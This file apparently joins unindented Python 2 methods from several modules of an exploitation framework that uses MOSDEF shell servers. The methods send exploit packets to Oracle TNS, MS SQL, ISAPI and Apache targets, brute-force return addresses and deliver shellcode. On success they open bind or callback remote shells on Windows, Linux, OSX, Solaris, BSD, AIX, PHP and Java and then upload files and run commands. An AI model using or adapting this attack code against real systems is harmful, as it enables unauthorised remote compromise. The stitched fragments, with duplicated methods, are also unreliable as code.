def win32NonCallbackShellcodeCheck(self):
"""
Tries to connect to a bind shellcode on the remote server
returns our new Node on success, otherwise returns None
"""
s = self.gettcpsock()
try:
self.log("WP> Attempting connection to Bind Mosdef on port %s:%d" %
(self.target.interface, self.bindPort))
s.connect((self.target.interface, self.bindPort))
except:
self.log("WP> Connection did not succeed to port %d" %
self.bindPort)
return None
# got a connection, verify with GO handshake
if self.checkTriggerWin32(s):
self.log("WP> Got a Bind Mosdef socket!")
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
newshell = win32MosdefShellServer.win32shellserver(
s, node, self.logfunction)
#Need this if we use CreateThreadRecvExecWin32
newshell.argsDict["fromcreatethread"] = 1
newshell.node.startup()
return newshell.node
return None
def doGOMOSDEFWin32(self, s, currentNode=None):
s.set_timeout(20)
self.log("Trying to start MOSDEF...")
import win32MosdefShellServer
from win32Node import win32Node
newshell = win32Node()
if currentNode:
pnode = currentNode
else:
pnode = self.argsDict["passednodes"][0]
newshell.parentnode = pnode
pnode.newNode(newshell)
shell = win32MosdefShellServer.win32shellserver(s,
newshell,
logfunction=self.log)
if not shell:
self.log("Could not make a shell object from active socket")
return 0
ret = shell.startup()
if not ret:
self.log("Failed to initialise MOSDEF")
return 0
shell.started = 1
return newshell
def doOracleRun(self, header, oraret, seoffset, align):
s = self.connect_to_host(self.host, self.port)
if s == 0:
self.log("Could not connect")
self.setInfo("%s attacking %s:%d - done (failed!)" %
(NAME, self.host, self.port))
return 0
chunk = self.getOracleChunk(oraret, seoffset, align)
self.log("Trying single shot attack")
self.doRequest(s, header, chunk)
self.websend(s, "\r\n")
# allow some time for searchcode
self.snooze(5)
if self.checkTriggerWin32(s, falsepositive=1):
self.log("Setting success flag")
import win32MosdefShellServer
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
newshell = win32MosdefShellServer.win32shellserver(
s, node, self.logfunction)
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
newshell.node.startup()
return newshell.node
else:
s.close()
# Oracle targets are single shot, we failed
self.setInfo("%s attacking %s:%d - done (failed!)" %
(NAME, self.host, self.port))
return 0
def run(self):
self.getargs()
if not self.test():
return 0
self.log("Using password: %s" % prettyprint(self.password))
vername = TARGETS[self.version]
self.setInfo("%s running against %s" % (NAME, vername))
s = self.connectTo()
if not s:
self.log("No connection...failed")
return 0
s.sendall(self.password)
if "WINDOWS" in vername.upper():
import win32MosdefShellServer
from win32Node import win32Node
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
win32MosdefShellServer.win32shellserver(s, node, self.logfunction)
node.startup()
return node
else:
self.log("No version known for %s" % vername)
return 0
def win32NonCallbackShellcodeCheck(self):
"""
Tries to connect to a bind shellcode on the remote server
returns our new Node on success, otherwise returns None
See msrpcexploit.py for an example of usage
"""
if self.callback != None and self.callback.ip == "0.0.0.0": # check for BindMosdef
s = self.gettcpsock()
try:
self.log("Trying Bind Mosdef mode on port %d..."%self.callback.port)
s.connect((self.target.interface, self.callback.port))
except:
self.log("Connection did not succeed to port %d"%self.callback.port)
self.setInfo("%s attacking %s:%d (failed)"%(self.name,self.host,self.port), showlog=True)
return None
else:
return None
# got a connection, verify with GO handshake
if self.checkTriggerWin32(s):
self.log("Got a Bind Mosdef socket!")
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
newshell = win32MosdefShellServer.win32shellserver(s, node,self.logfunction)
newshell.argsDict["fromcreatethread"] = 1
newshell.node.startup()
self.setInfo("%s attacking %s:%d (succeeded!)"%(self.name, self.host, self.port), showlog=True)
return newshell.node
return None
def doStageTwo(self, s):
self.log("Got trigger!")
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
newshell = win32MosdefShellServer.win32shellserver(s, node, self.logfunction)
newshell.node.startup()
self.setInfo("%s attacking %s:%d - (succeeded!)" % (NAME, self.host, self.port), showlog=1)
return newshell.node
def run(self):
self.getArgs()
s = self.gettcpsock()
try:
s.connect((self.host, self.port))
except:
self.log("Failed to connnect")
self.setInfo("%s: Failed to connect to port %s against host %s" %
(self.name, self.port, self.host))
return 0
if self.version == 0:
self.test()
if self.version == 0:
self.log("Could not auto-target against that host!")
self.setInfo("%s: Failed to auto-target against host %s" %
(self.name, self.host))
return 0
self.setInfo("%s Running against %s:%d" %
(self.name, self.host, self.port))
self.log("Sending WMS_INIT")
s.send(self.packetFragGen(WMS_INIT))
rsp = s.recv(256)
# go for the kill
self.log("Sending Exploit packet")
s.send(self.buildKillPacket())
# do trigger stuff
ret = self.checkTriggerWin32(s)
if not ret:
# 4 times total, createthreadcode can be slow :/
ret = self.checkTriggerWin32(s)
if ret:
from win32Node import win32Node
import win32MosdefShellServer
self.log("Got trigger!")
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
newshell = win32MosdefShellServer.win32shellserver(
s, node, self.logfunction)
newshell.node.startup()
self.setInfo("%s attacking %s:%d - (succeeded!)" %
(NAME, self.host, self.port),
showlog=1)
self.log("Thanks \\0/")
return newshell.node
else:
self.log("No trigger for win32...failed to call GOcode?")
self.setInfo("%s attacking %s:%d - (failed!)" %
(NAME, self.host, self.port),
showlog=1)
return 0
return 1
def run(self):
self.host = self.target.interface
print "Attacking: %s" % self.host
self.port = int(self.argsDict.get("port", self.port))
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
if self.version == 0:
self.log("Auto versioning not available")
self.setInfo("%s attacking %s:%d - done (failed!)" %
(NAME, self.host, self.port))
return 0
self.info, self.align, self.retadd, self.seoffset = targets[
self.version]
cdata = self.buildCdata(self.align, self.retadd, self.seoffset)
s = self.connectToHost(self.host, self.port)
if not s:
self.log("Could not connect to TNS listener")
return 0
if s:
self.log("Connected to TNS listener at %s:%d" %
(self.host, self.port))
TNS = tnslib.TNS()
TNS.sendRawCommand(s, cdata)
else:
self.done = 1
if self.checkTriggerWin32(s):
self.log("Setting success flag")
self.setSucceeded()
self.done = 1
import win32MosdefShellServer
from win32Node import win32Node
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
newshell = win32MosdefShellServer.win32shellserver(
s, node, self.logfunction)
ret = node
else:
s.close()
if self.ISucceeded():
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
return ret
self.setInfo("%s attacking %s:%d - done (failed!)" %
(NAME, self.host, self.port))
return 0
def collectEchoMarker(self, s):
"""used for peek code"""
import win32MosdefShellServer
from win32Node import win32Node
data = s.recv(4)
if data == "ABCD":
self.log("Got echo marker!")
else:
self.log("Got wrong marker: %s" % prettyprint(data))
return None
self.log("Initializing Win32Node")
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
win32MosdefShellServer.win32shellserver(s, node, self.logfunction)
node.startup()
self.log("Finished initializing win32Node")
self.setInfo("%s Done (successfully stole socket!)" % self.name)
return node
def handleGoCode(self, sock):
ret=self.checkTriggerWin32(sock)
if not ret:
#try twice
ret=self.checkTriggerWin32(sock)
if ret:
self.log("Got trigger!")
node=win32Node()
node.parentnode=self.argsDict["passednodes"][0]
win32MosdefShellServer.win32shellserver(sock,node,self.logfunction)
node.startup()
self.setInfo("%s attacking %s:%d - (succeeded!)" % (NAME, self.host, self.port), showlog=1)
return node
else:
self.log("No trigger for win32...failed to call GOcode?")
self.setInfo("%s attacking %s:%d - (failed!)" % (NAME, self.host, self.port), showlog=1)
return 0
def run(self):
#first make socket connection to target 1433
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
s = self.gettcpsock()
#s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((self.host, self.port))
except:
self.log("Could not connect!")
self.setInfo("%s attacking %s:%d (could not connect)" %
(NAME, self.host, self.port))
return 0
sploitstring = self.makesploit()
s.sendall(sploitstring)
if self.checkTriggerWin32(s):
self.log("Setting success flag")
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
newshell = win32MosdefShellServer.win32shellserver(
s, node, self.logfunction)
self.setInfo("%s Done" % self.name)
return node
try:
result = s.recv(1000)
except:
result = ""
self.log("result=" + prettyprint(result))
s.close()
#failed?
self.setInfo("%s attacking %s:%d (done)" %
(NAME, self.host, self.port))
return self.ISucceeded()
def doKnownRun(self, header):
# try the known range first
self.log("Trying known target range")
# pedantic max connect, initial connect should work fine
max = 5
for retadd in known[0]:
# the kill sock
s = self.connect_to_host(self.host, self.port)
if s == 0:
self.log("Could not connect, retry")
max = max - 1
if not max:
self.log(
"Max attempt of connect failures reached, exiting")
self.setInfo("%s attacking %s:%d - done (failed!)" %
(NAME, self.host, self.port))
# free listener
self.setState("done")
return 0
else:
chunk = self.getChunk(retadd)
self.log("Trying retadd: [0x%.8X]" % retadd)
self.doRequest(s, header, chunk)
self.websend(s, "\r\n")
# error messages might have 'G' so we check for 'GOOO'
if self.checkTriggerWin32(s, falsepositive=1):
self.log("Setting success flag")
self.setSucceeded()
import win32MosdefShellServer
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
newshell = win32MosdefShellServer.win32shellserver(
s, node, self.logfunction)
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
newshell.node.startup()
return newshell.node
else:
s.close()
return 0
def checkisapiGO(self,s):
"""looks for isapi GOcode. Returns data pulled from web server
if unsuccessful
On success does handshake and
"""
data=self.webrecv(s,size=4)
if data!="GGGG":
return data
self.log("ISAPI GO CODE DETECTED!")
#otherwise we found it!
#the next bytes are READCLIENT,WRITECLIENT, and CONTEXTPOINTER (4 bytes each, of course)
import win32MosdefShellServer
from win32Node import win32Node
node=win32Node()
node.parentnode=self.argsDict["passednodes"][0]
#s is actually a socket object or an SSL object here
newshell = win32MosdefShellServer.win32shellserver(s,node,self.logfunction)
newshell.argsDict["isapidict"]={"ssl": self.ssl,"exploit":self}
newshell.startup()
node.startup()
self.newnode=node
self.succeeded=1
return ""
def run(self):
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.setInfo("%s attacking %s:%d - (in progress)" %
(NAME, self.host, self.port),
showlog=1)
self.s = self.gettcpsock()
try:
ret = self.s.connect((self.host, self.port))
except:
self.log("Failed to connect")
self.setInfo("%s attacking %s:%d - (failed to connect)" %
(NAME, self.host, self.port),
showlog=1)
return 0
self.s.set_timeout(10)
self.s.sendall("GET / HTTP/1.0\r\n" + "a\r\n" * 31 + self.shellcode +
"\r\n"
"\r\n")
# check for BindMosdef mode
if self.callback and self.callback.ip == "0.0.0.0":
self.s = self.gettcpsock()
import time
time.sleep(0.5)
print "[!] Trying BindMosdef connect to: %s:%d" % (
self.host, self.callback.port)
try:
self.s.connect((self.host, self.callback.port))
except:
self.log("Failed to connect")
self.setInfo("%s attacking %s:%d - (failed to connect)" %
(NAME, self.host, self.port),
showlog=1)
return 0
ret = self.checkTriggerWin32(self.s)
if not ret:
#try twice
ret = self.checkTriggerWin32(self.s)
if ret:
self.log("Got trigger!")
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
newshell = win32MosdefShellServer.win32shellserver(
self.s, node, self.logfunction)
newshell.node.startup()
self.setInfo("%s attacking %s:%d - (succeeded!)" %
(NAME, self.host, self.port),
showlog=1)
self.log("Thanks \\0/")
return newshell.node
else:
self.log("No trigger for win32...failed to call GOcode?")
self.setInfo("%s attacking %s:%d - (failed!)" %
(NAME, self.host, self.port),
showlog=1)
return 0
def doBruteRun(self, header, startbrute, endbrute, brutestep):
tries = endbrute - startbrute
tries = tries / brutestep
if not self.brute:
tries = 1
self.log("Tries: %d, Step: [0x%.8X], Range: [0x%.8X] to [0x%.8X]" %
(tries, brutestep, startbrute, endbrute))
max = self.maxconnect
for i in range(0, tries):
self.setProgress((float(i) / float(tries)) * 100)
if self.getState() == self.HALT:
self.log("Ending bruteforce run at [0x%.8X] after %d tries" %
(startbrute, int(i)))
self.setInfo("%s attacking %s:%d - done (aborted!)" %
(NAME, self.host, self.port))
return 0
s = self.connect_to_host(self.host, self.port)
if s == 0:
self.log("could not connect, retry")
max = max - 1
if not max:
self.log(
"Max attempt of connect failures reached, exiting")
self.setInfo("%s attacking %s:%d - done (failed!)" %
(NAME, self.host, self.port))
return 0
# give main apache some time to recover
time.sleep(1)
# adjust tries, this one doesn't counnt
i = i - 1
else:
startbrute = self.sanitiseAdd(startbrute)
chunk = self.getChunk(startbrute)
self.log("Trying retadd: [0x%.8X]" % startbrute)
self.doRequest(s, header, chunk)
self.websend(s, "\r\n")
if self.checkTriggerWin32(s, falsepositive=1):
self.log("Setting success flag")
self.setSucceeded()
import win32MosdefShellServer
node = win32Node()
node.parentnode = self.argsDict["passednodes"][0]
newshell = win32MosdefShellServer.win32shellserver(
s, node, self.logfunction)
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
newshell.node.startup()
return newshell.node
else:
s.close()
#We always always grab the socket - so this should never happen
#if this triggers it implies we got a callback...which we don't do.
#if self.ISucceeded() or self.done:
# self.setInfo("%s attacking %s:%d - done (success!)"% (NAME, self.host, self.port))
# self.log("Success at [0x%.8X]"% startbrute)
# return 1
startbrute = startbrute + brutestep
# end of run, no success
self.log("No success in brute run")
return 0
def handleConnection(self, connection):
try:
connection.set_timeout(None)
except:
self.log("[!] likely an ipv6 socket, set_timeout not supported !")
server = None
if self.type == self.targets.index("LINUXEXECVE_INTEL"):
self.log("Connected: Running a Linux server...")
import linuxMosdefShellServer
#time.sleep(10)
newshell = unixShellNode()
pnode = localNode()
pnode.newNode(newshell)
server = linuxMosdefShellServer.execveshellserver(
connection, newshell)
#server.addInitString(self.initstring)
#server.addInitString("chrootbreak")
server.startup()
elif self.type == self.targets.index("LINUXMOSDEF_INTEL"):
self.log("Connected, Linux MOSDEF ...")
newshell = linuxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = MosdefShellServer('Linux', 'i386')(connection, newshell)
#shell=linuxMosdefShellServer.linuxshellserver(connection,newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index('OSXMOSDEF_INTEL'):
self.log('Connected, OSX MOSDEF INTEL ...')
newshell = osxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = MosdefShellServer('OSX', 'i386')(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("OSXMOSDEF_PPC"):
self.log("Connected, OSX MOSDEF PPC ...")
import osxMosdefShellServer
newshell = osxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = osxMosdefShellServer.osxshellserver(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("WIN32MOSDEF_INTEL"):
self.log("Connected, running win32 MOSDEF server")
import win32MosdefShellServer
from win32Node import win32Node
newshell = win32Node()
pnode = localNode()
pnode.newNode(newshell)
shell = win32MosdefShellServer.win32shellserver(connection,
newshell,
logfunction=None)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("SOLARISMOSDEF_SPARC"):
self.log("Connected, Solaris MOSDEF ...")
import solarisMosdefShellServer
newshell = solarisNode()
pnode = localNode()
pnode.newNode(newshell)
shell = solarisMosdefShellServer.solarisshellserver(
connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("SOLARISMOSDEF_INTEL"):
self.log("Connected, Solaris x86 MOSDEF ...")
import solarisMosdefShellServer
newshell = solarisNode()
pnode = localNode()
pnode.newNode(newshell)
shell = solarisMosdefShellServer.solarisx86shellserver(
connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("BSDMOSDEF_INTEL"):
self.log("Connected, BSD MOSDEF")
import bsdMosdefShellserver
newshell = bsdNode()
pnode = localNode()
pnode.newNode(newshell)
shell = bsdMosdefShellserver.bsdshellserver(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("AIXMOSDEF_51_PPC"):
self.log("Connected, AIX MOSDEF")
newshell = aixNode()
pnode = localNode()
pnode.newNode(newshell)
aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC')
shell = aixMosdefShellServer(connection, newshell, version='5.1')
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("AIXMOSDEF_52_PPC"):
self.log("Connected, AIX MOSDEF")
newshell = aixNode()
pnode = localNode()
pnode.newNode(newshell)
aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC')
shell = aixMosdefShellServer(connection, newshell, version='5.2')
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("PHPMULTI"):
newsocket = connection
self.log("Starting up a %s server" % type)
import phplistener
from ScriptShellServer import phpshellserver
node = ScriptNode()
node.parentnode = self.engine.getLocalNode()
shell = phpshellserver(newsocket, node)
shell.startup()
newshell = node
server = shell
elif self.type == self.targets.index("UNIXSHELL"):
newsocket = connection
self.log("Starting up Unix Shell")
pnode = localNode()
telnetshell = Telnet()
telnetshell.sock = newsocket
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.log)
newshell = unixShellNode()
newshell.shell = shell
shell.node = newshell
pnode.newNode(newshell)
server = shell
elif self.type == self.targets.index("JAVA"):
newsocket = connection
self.log("Starting up a %s server" % type)
from Nodes.JavaShellServer import javashellserver
from JavaNode import JavaNode
node = JavaNode()
node.parentnode = self.engine.getLocalNode()
shell = javashellserver(newsocket, node)
shell.startup()
newshell = node
server = shell
else:
print "Don't know what type I am!"
sys.exit(1)
if self.mode == "interactive":
print "Letting user interact with server"
if server:
server.interact()
else:
print "No server...exiting this shell..."
elif self.mode == "Run one command":
print "Running a command or set of commands"
if self.uploadfiles != []:
for f in self.uploadfiles:
print "Uploading %s" % f
# Why doesn't this use exploits/upload/upload.py then?
print server.upload(f)
print server.runcommand(self.command)
###insert your post-op stuff here!!!
###you might want:
###server.doexitthread(1)
###or
server.runexitprocess()
if server:
server.disconnect()
return
